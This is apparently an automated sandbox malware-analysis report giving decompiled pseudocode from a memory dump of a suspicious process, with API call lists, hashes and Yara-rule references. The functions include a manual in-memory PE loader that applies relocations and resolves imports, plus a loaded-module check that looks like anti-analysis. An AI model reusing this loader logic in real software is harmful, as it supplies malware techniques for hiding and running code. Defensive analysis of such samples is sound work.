								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E00094C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E00095D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E00094AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

APIs

memcpy.MSVCRT ref: 00092E7D
memcpy.MSVCRT ref: 00092EF4
memcpy.MSVCRT ref: 00092F23
memcpy.MSVCRT ref: 00092F4F
memcpy.MSVCRT ref: 00093004

Part of subcall function 00095D90: memcpy.MSVCRT ref: 00095E6E

Part of subcall function 00094AF0: memcpy.MSVCRT ref: 00094B1A

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction ID: 185e7931b200b5f00758bf730992471f6333a59919987fd71983e5a0ce0181f8
Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction Fuzzy Hash: 74D11271A00B049FCB68CF69D8D4AAAB7F1FF88304B24892DE88AC7741D771E9449B54

Uniqueness

Uniqueness Score: -1.00%

Function 00084D6D, Relevance: 6.4, APIs: 4, Instructions: 432
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00084D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				signed int _t122;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x9e688; // 0xb0000
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t14 = E0008B7A8(0x9b9c8,  &_v516) + 1; // 0x1
					E0008A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E0008A471( &_v556, _t298);
					 *0x9e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						 *0x9e680 = E0008E1BC(0x9b9cc, _t299);
						 *_t337 = 0x610;
						_t124 = E000895E1(0x9b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x9e688; // 0xb0000
						_t127 = E000892E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E000885D5( &_v612);
						_t130 = E0008B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E0008861A( &_v616, 0xfffffffe);
						_t133 =  *0x9e688; // 0xb0000
						_t22 = _t133 + 0x114; // 0xb0114
						E00084A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x9e688; // 0xb0000
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x9e680; // 0x0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564);
							}
							_v620 = _v620 & 0x00000000;
							E0008E2C6(_t353,  &_v576);
							_pop(_t262);
							_t142 =  *0x9e6b4; // 0x28dfa98
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E0008E2C6(_t353,  &_v588);
								_t235 =  *0x9e6b4; // 0x28dfa98
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x9e73c;
							if( *0x9e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x9e680; // 0x0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x9e688; // 0xb0000
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E000849A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x9e684; // 0x28df8f0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x9e688; // 0xb0000
											_t184 = E0008FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E00088604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E0008109A(_t262, 0x148);
													_t305 =  *0x9e688; // 0xb0000
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E0008902D(_t271,  &_v572);
													_t272 =  *0x9e688; // 0xb0000
													_t188 = E000860DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x9e688; // 0xb0000
														__eflags = _t200 + 0x1020;
														E00089640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E000885D5( &_v636);
														E0008A911(_t333, 0, 0xbb8, 1);
														E0008861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E0008861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E000849A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x9e684; // 0x28df8f0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E00088604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E000895E1(_t278, 0x32d);
										_t280 =  *0x9e688; // 0xb0000
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E00089640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E000885D5( &_v636);
										E0008A911(_t249, 0, 0xbb8, 1);
										E0008861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E000895E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x9e688; // 0xb0000
								_t329 = E000892E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E0008B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x9e684; // 0x28df8f0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E0008861A( &_v612, 0xfffffffe);
								}
								E000885D5( &_v616);
								_t150 =  *0x9e688; // 0xb0000
								lstrcpynW(_t150 + 0x438,  *0x9e740, 0x105);
								_t153 =  *0x9e688; // 0xb0000
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x9e738, 0x105);
								_t331 =  *0x9e688; // 0xb0000
								_t117 = _t331 + 0x228; // 0xb0228
								 *((intOrPtr*)(_t331 + 0x434)) = E00088FBE(_t117, __eflags);
								E0008861A(0x9e740, 0xfffffffe);
								E0008861A(0x9e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E000895C7(0x6e2);
				_v616 = _t250;
				_t326 = E000895C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E000885C2( &_v616);
					_t122 = E000885C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}

0x00084d6d
0x00084d73
0x00084d79
0x00084d7e
0x00084d8c
0x00084d8f
0x00084dee
0x00084e00
0x00084e03
0x00084e0a
0x00084e0f
0x00084e14
0x00084e1b
0x00084e25
0x00084e2c
0x00084e37
0x00084e3c
0x00084e43
0x00084e49
0x00084e4b
0x00084e4c
0x00084e50
0x00084e5b
0x00084e60
0x00084e69
0x00084e6e
0x00084e76
0x00084e7d
0x00084e7e
0x00084e80
0x00084e9c
0x00084e9f
0x00084e9f
0x00084ea8
0x00084ead
0x00084ebd
0x00084ec5
0x00084eca
0x00084ed0
0x00084ed3
0x00084ed9
0x00084ef8
0x00084efe
0x00084eff
0x00084f00
0x00084f01
0x00084f02
0x00084f03
0x00084f0d
0x00084f11
0x00084f16
0x00084f19
0x00084f1b
0x00084f2d
0x00084f2d
0x00084f2f
0x00084f3b
0x00084f40
0x00084f46
0x00084f4f
0x00084f52
0x00084f54
0x00084f5f
0x00084f64
0x00084f69
0x00084f6e
0x00084f6e
0x00084f71
0x00084f78
0x00000000
0x00084f7e
0x00084f7e
0x00084f83
0x00084f87
0x00084f89
0x00084f8c
0x00084f8e
0x00084f94
0x00084f94
0x00084f8e
0x00084f96
0x00084f9b
0x00084fa1
0x00084fa3
0x00000000
0x00084fa9
0x00084fa9
0x00084fad
0x00085082
0x00085088
0x0008508e
0x00085099
0x0008509a
0x0008509b
0x0008509c
0x000850a2
0x000850a7
0x000850ad
0x000850b5
0x000850bb
0x000850be
0x000850cd
0x000850d4
0x000850d7
0x000850e4
0x000850e8
0x000850f5
0x000850fa
0x000850fd
0x000850ff
0x00085110
0x00085112
0x00085116
0x00085117
0x00085119
0x00085124
0x00085129
0x00085136
0x0008513a
0x0008513b
0x0008513d
0x00085145
0x00085146
0x0008514b
0x00085163
0x00085168
0x0008516b
0x0008516f
0x00085171
0x00085184
0x0008518e
0x00085192
0x0008519a
0x0008519b
0x000851a3
0x000851a4
0x000851a9
0x000851b5
0x000851bf
0x000851d1
0x000851dd
0x000851e2
0x000851e2
0x000851ec
0x000851f2
0x000851f2
0x00085119
0x000850ff
0x00000000
0x00085088
0x00084fb3
0x00084fb6
0x00000000
0x00000000
0x00084fbc
0x00084fc7
0x00084fc8
0x00084fc9
0x00084fca
0x00084fd0
0x00084fd5
0x00084fe9
0x00084fee
0x00084ff2
0x00084ffd
0x00085006
0x00085008
0x0008500c
0x0008500d
0x0008500f
0x0008501a
0x00085020
0x00085032
0x00085035
0x00085038
0x00085045
0x0008504d
0x00085057
0x00085069
0x00085075
0x0008507a
0x00000000
0x0008500f
0x00084fa3
0x00084edb
0x00084edb
0x00084ee1
0x00084ee3
0x00000000
0x00000000
0x00084ee5
0x00084ee9
0x000851f3
0x000851f8
0x000851fe
0x00085200
0x00085201
0x00085205
0x00085215
0x0008521a
0x0008521e
0x00085220
0x00085224
0x00085229
0x0008522b
0x0008522d
0x00085233
0x00085233
0x00085240
0x00085246
0x0008524c
0x00085251
0x0008526f
0x00085271
0x0008527d
0x0008527d
0x00085283
0x00085285
0x0008528b
0x0008529d
0x000852a3
0x000852af
0x000852b7
0x000852b7
0x000852b7
0x000852b9
0x000852bf
0x000852bf
0x00084eef
0x00084ef2
0x00000000
0x00000000
0x00000000
0x00084ef2
0x00084ed9
0x00084e1d
0x00084e1d
0x00000000
0x00084e1d
0x00084d9b
0x00084da2
0x00084dab
0x00084dad
0x00084db3
0x00084dc4
0x00084dcd
0x00084dcd
0x00084dd9
0x00084de2
0x00084de7
0x00084dec
0x00000000
0x00000000
0x00084dec

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DC0
GetModuleHandleA.KERNEL32(00000000), ref: 00084DC7
lstrcpynW.KERNEL32(000AFBC8,00000105), ref: 0008526F
lstrcpynW.KERNEL32(000AFDD8,00000105), ref: 00085283

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: HandleModulelstrcpyn
String ID:
API String ID: 3430401031-0
Opcode ID: 930a3a540927b92be81f6154236b076298cfb6386bf6fb57d72f0273bc83c95f
Instruction ID: 161cbc9eeedcce8db67ccaa0b8f26abb365355608c06558398d668d8ddb63534
Opcode Fuzzy Hash: 930a3a540927b92be81f6154236b076298cfb6386bf6fb57d72f0273bc83c95f
Instruction Fuzzy Hash: 64E1AE71608341AFE750FF64DC86FAA73E9BB98314F04092AF584DB2D2EB74D9448B52

Uniqueness

Uniqueness Score: -1.00%

Function 00092AEC, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00092AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

APIs

GetModuleHandleA.KERNEL32(?), ref: 00092C4C
LoadLibraryA.KERNEL32(?), ref: 00092C65
GetProcAddress.KERNEL32(00000000,890CC483), ref: 00092CC1
GetProcAddress.KERNEL32(00000000,?), ref: 00092CE0

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
Instruction ID: f71a99207cef5de23c8ddc2f8d773f6edabddc3cd5bada4ad458651b88394428
Opcode Fuzzy Hash: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
Instruction Fuzzy Hash: E4A17AB5A01209EFCF54CFA8C885AADBBF1FF08314F148459E815AB351D734AA81DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00081C68, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00081C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x9e6dc; // 0x0
				_t13 = E0008A4BF(_t41, 0);
				while(_t13 < 0) {
					E0008980C( &_v28);
					_t43 =  *0x9e6e0; // 0x0
					_t15 =  *0x9e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x9e684; // 0x28df8f0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x9e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x9e684; // 0x28df8f0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x9e6dc; // 0x0
						__eflags = 0;
						_t13 = E0008A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x9e6e8; // 0x0
				_v28 = _t20;
				_t22 = E0008A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x9e6d0, 0, 0, 2);
					E0008980C(0x9e6e0);
					_t64 = E00081A1B( &_v28, E00081226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x9e760);
						_t51 = 0x27;
						E00089F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x9e684; // 0x28df8f0
				 *((intOrPtr*)(_t29 + 0x30))( *0x9e6d0);
				_t48 =  *0x9e6dc; // 0x0
				 *0x9e6d0 = 0;
				E0008A4DB(_t48);
				E0008861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8156fc2b5aa259b19a62585b2bf0d8baf624dd5d5a1b1a098ca39107227a8b3
Instruction ID: b7eecfca9752b51bd3878614f3e3ca223f58aa9d07610ca166e7e1ee13e62024
Opcode Fuzzy Hash: f8156fc2b5aa259b19a62585b2bf0d8baf624dd5d5a1b1a098ca39107227a8b3
Instruction Fuzzy Hash: A431C232604340AFE754FFA4EC859AA77ADFB943A0F54092BF581C32E2DE389C058756

Uniqueness

Uniqueness Score: -1.00%

Function 00081B2D, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00081B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x9e6f4; // 0x0
				_t12 = E0008A4BF(_t38, 0);
				while(_t12 < 0) {
					E0008980C( &_v28);
					_t40 =  *0x9e700; // 0x0
					_t14 =  *0x9e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x9e684; // 0x28df8f0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x9e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x9e684; // 0x28df8f0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x9e6f4; // 0x0
								__eflags = 0;
								_t12 = E0008A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E0008980C(0x9e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x9e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x9e6e8; // 0x0
				_v28 = _t24;
				_t61 = E00081A1B( &_v28, E0008131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x9e760);
					_t48 = 0x27;
					E00089F06(_t48);
				}
				if(_v24 != 0) {
					E00086890( &_v24);
				}
				_t26 =  *0x9e684; // 0x28df8f0
				 *((intOrPtr*)(_t26 + 0x30))( *0x9e6ec);
				_t28 =  *0x9e758; // 0x0
				 *0x9e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x9e6f4; // 0x0
				 *0x9e758 =  !=  ? 1 : _t28;
				E0008A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}

APIs

GetCurrentProcess.KERNEL32(0009E6EC,00000000,00000000,00000002), ref: 00081BCC
GetCurrentThread.KERNEL32(00000000), ref: 00081BCF
GetCurrentProcess.KERNEL32(00000000), ref: 00081BD6
DuplicateHandle.KERNEL32 ref: 00081BD9

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
